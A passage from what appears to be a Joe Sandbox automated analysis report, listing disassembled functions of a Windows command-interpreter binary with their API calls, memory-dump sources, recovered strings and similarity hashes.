                                                                                                                                                                        • Instruction Fuzzy Hash: 21414523E0D647C2FB58AF74A4153B922A5BF45784F544439D90ECB396EE3EE448C30A
                                                                                                                                                                        Function 00007FF6E944E3E8 Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$File_get_osfhandle$PointerReadlongjmp
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1532185241-0
                                                                                                                                                                        • Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                                                                                                        • Instruction ID: 38f86971cb9c174610f9835d657f42aed53715c9c406710c3adc4fa41e4938fd
                                                                                                                                                                        • Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                                                                                                        • Instruction Fuzzy Hash: DC419A33A04751CBE7249F21A44167EAAA1FF88B80F454535EA0A83785CF3EE84ACB45
                                                                                                                                                                        Function 00007FF6E9424FE8 Relevance: 7.6, APIs: 5, Instructions: 102fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3588551418-0
                                                                                                                                                                        • Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                                                                                                                        • Instruction ID: b692a30e48002c2f70d2a6037bb799864b4e091259ed0ecf0f0ed70cbfc91bf1
                                                                                                                                                                        • Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                                                                                                                        • Instruction Fuzzy Hash: 0A41A073A18242CBE7249F51A84037DB6A1FF85B81F144139DA0EC7791DE3EE849CB4A
                                                                                                                                                                        Function 00007FF6E944E558 Relevance: 7.6, APIs: 5, Instructions: 100COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorModememset$FullNamePath_wcsicmp
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2123716050-0
                                                                                                                                                                        • Opcode ID: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
                                                                                                                                                                        • Instruction ID: 6a74fab02a1f0d28e1f356b3ed3f6fe3f1767ec2acd278ce82177189d1a1a94e
                                                                                                                                                                        • Opcode Fuzzy Hash: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
                                                                                                                                                                        • Instruction Fuzzy Hash: 47418933709AC2CAEB768F21D8543E927A4EF49B88F444134DA4D8AA98DE3DD249C705
                                                                                                                                                                        Function 00007FF6E94265F8 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3114114779-0
                                                                                                                                                                        • Opcode ID: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                                                                                                                                        • Instruction ID: 96b4062202b103e94c46b2104182f971b8e32c1c7b20c4d1c39be0c70a7ee814
                                                                                                                                                                        • Opcode Fuzzy Hash: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                                                                                                                                        • Instruction Fuzzy Hash: 22410333A09A46CAE7008F65E4403AC3BA5FB88B48F544136EA0ED3B54DF39E41AC745
                                                                                                                                                                        Function 00007FF6E944A73C Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6E9449A82), ref: 00007FF6E944A77A
                                                                                                                                                                        • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6E9449A82), ref: 00007FF6E944A7AF
                                                                                                                                                                        • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6E9449A82), ref: 00007FF6E944A80E
                                                                                                                                                                        • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6E9449A82), ref: 00007FF6E944A839
                                                                                                                                                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6E9449A82), ref: 00007FF6E944A850
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: QueryValue$CloseErrorLastOpen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2240656346-0
                                                                                                                                                                        • Opcode ID: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                                                                                                                                        • Instruction ID: e16199ceed87be875e71b6cb14246c44dcec4a224bfb29eacde6037902123b6c
                                                                                                                                                                        • Opcode Fuzzy Hash: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                                                                                                                                        • Instruction Fuzzy Hash: CD31AE33A18A51D2E7108F14E440679B6E4FF88790F944034EA4E83764EF3ED85ACF06
                                                                                                                                                                        Function 00007FF6E944D0C0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF6E94301B8: _get_osfhandle.MSVCRT ref: 00007FF6E94301C4
                                                                                                                                                                          • Part of subcall function 00007FF6E94301B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6E943E904,?,?,?,?,00000000,00007FF6E9433491,?,?,?,00007FF6E9444420), ref: 00007FF6E94301D6
                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6E944D0F9
                                                                                                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF6E944D10F
                                                                                                                                                                        • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF6E944D166
                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6E944D17A
                                                                                                                                                                        • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF6E944D18C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3008996577-0
                                                                                                                                                                        • Opcode ID: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                                                                                                                                        • Instruction ID: d011fbfc65ada489dd715ca07d9616cf51d1639f2834147b5115236db0190556
                                                                                                                                                                        • Opcode Fuzzy Hash: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                                                                                                                                        • Instruction Fuzzy Hash: 9F212926B14A51CAE7009FB1E8001BD77B0FF4DB49B445225EE4D93B98DF39D049CB19
                                                                                                                                                                        Function 00007FF6E9445770 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 169COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateSemaphore
                                                                                                                                                                        • String ID: _p0$wil
                                                                                                                                                                        • API String ID: 1078844751-1814513734
                                                                                                                                                                        • Opcode ID: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                                                                                                                        • Instruction ID: 1f731e7d42db2951187d2f4fd287ad428ec6da8aacc2ea148c69545d9b6e5f5e
                                                                                                                                                                        • Opcode Fuzzy Hash: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                                                                                                                        • Instruction Fuzzy Hash: A251D663B29782C6EF219F5484547BD6290EF84B90F544435DA0D87785EF3EE41ECB0A
                                                                                                                                                                        Function 00007FF6E944B89C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF6E944B934
                                                                                                                                                                        • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6E9435085), ref: 00007FF6E944B9A5
                                                                                                                                                                        • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6E9435085), ref: 00007FF6E944B9F7
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                                                                                                                                        • String ID: %WINDOWS_COPYRIGHT%
                                                                                                                                                                        • API String ID: 1103618819-1745581171
                                                                                                                                                                        • Opcode ID: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                                                                                                                                        • Instruction ID: 47520710922e795082ad09df19d14116405759848b6d01ecb7e8523afbc95497
                                                                                                                                                                        • Opcode Fuzzy Hash: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                                                                                                                                        • Instruction Fuzzy Hash: D4415A63A08A86C2EB108F15941037D77A0FF59B94F859235DE8D93395EF3EE48ACB05
                                                                                                                                                                        Function 00007FF6E9450774 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$_wcslwr
                                                                                                                                                                        • String ID: [%s]
                                                                                                                                                                        • API String ID: 886762496-302437576
                                                                                                                                                                        • Opcode ID: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
                                                                                                                                                                        • Instruction ID: 0fbe20811b56e966fd51a0ec1b9ba4f4419f30eb2e92b78cb4392bd057d91923
                                                                                                                                                                        • Opcode Fuzzy Hash: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
                                                                                                                                                                        • Instruction Fuzzy Hash: DE314432705B82C6EB21CF6198507E967A0FB89B88F444135DA8D8BB59DF3DD249C705
                                                                                                                                                                        Function 00007FF6E94332E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF6E94333A8: iswspace.MSVCRT(?,?,00000000,00007FF6E944D6EE,?,?,?,00007FF6E9440632), ref: 00007FF6E94333C0
                                                                                                                                                                        • iswspace.MSVCRT(?,?,?,00007FF6E94332A4), ref: 00007FF6E943331C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: iswspace
                                                                                                                                                                        • String ID: off
                                                                                                                                                                        • API String ID: 2389812497-733764931
                                                                                                                                                                        • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                                                                                                                        • Instruction ID: c5f65b2d97c090f4b4ea1a4f1c25f9cc56675cff7fdb8bff946d33e9c3969f13
                                                                                                                                                                        • Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                                                                                                                        • Instruction Fuzzy Hash: 7B213623E0C647C2FA649F75A45937A66A0EF45F90F98C134DD0AC7681DE2EE848C30A
                                                                                                                                                                        Function 00007FF6E9449308 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                                                                                                        • String ID: %s=%s$DPATH$PATH
                                                                                                                                                                        • API String ID: 3731854180-3148396303
                                                                                                                                                                        • Opcode ID: ed2b41c8f7c1b35c8c8099a63381124b221818ea20370dab215de2e112638c1b
                                                                                                                                                                        • Instruction ID: 7a47398dabc748fbbe14b36771e5c1966389367f6e7845549214a74ccfe482b6
                                                                                                                                                                        • Opcode Fuzzy Hash: ed2b41c8f7c1b35c8c8099a63381124b221818ea20370dab215de2e112638c1b
                                                                                                                                                                        • Instruction Fuzzy Hash: 5D215B23B09656C1EB64DFA5E44037927A0AF89F80F884135DD0EC7395EE3EE549CB4A
                                                                                                                                                                        Function 00007FF6E9438198 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcscmp
                                                                                                                                                                        • String ID: *.*$????????.???
                                                                                                                                                                        • API String ID: 3392835482-3870530610
                                                                                                                                                                        • Opcode ID: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                                                                                                        • Instruction ID: efaf3a1b58be26ece150d6756f1c115eec6304c6c10baa4a80f4dbd39f54c2f6
                                                                                                                                                                        • Opcode Fuzzy Hash: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                                                                                                        • Instruction Fuzzy Hash: C8115226B18A52C1EB64CF37A44467DB2A1EF48B80F195031DE8D87B85DE3EE445C705
                                                                                                                                                                        Function 00007FF6E9449114 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: fprintf
                                                                                                                                                                        • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                                                                                        • API String ID: 383729395-2781220306
                                                                                                                                                                        • Opcode ID: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                                                                                                                        • Instruction ID: 454fdfe9d1689b63c802560a7b398818326b97f33ecf8360512a98663bcc248a
                                                                                                                                                                        • Opcode Fuzzy Hash: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                                                                                                                        • Instruction Fuzzy Hash: 8A119423908542C1FB658F24D5042B96261EF44BF0F445331DA7DC32D4EF2DE44AD74A
                                                                                                                                                                        Function 00007FF6E94309F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                                                                                                                                                                        Download Yara Rule
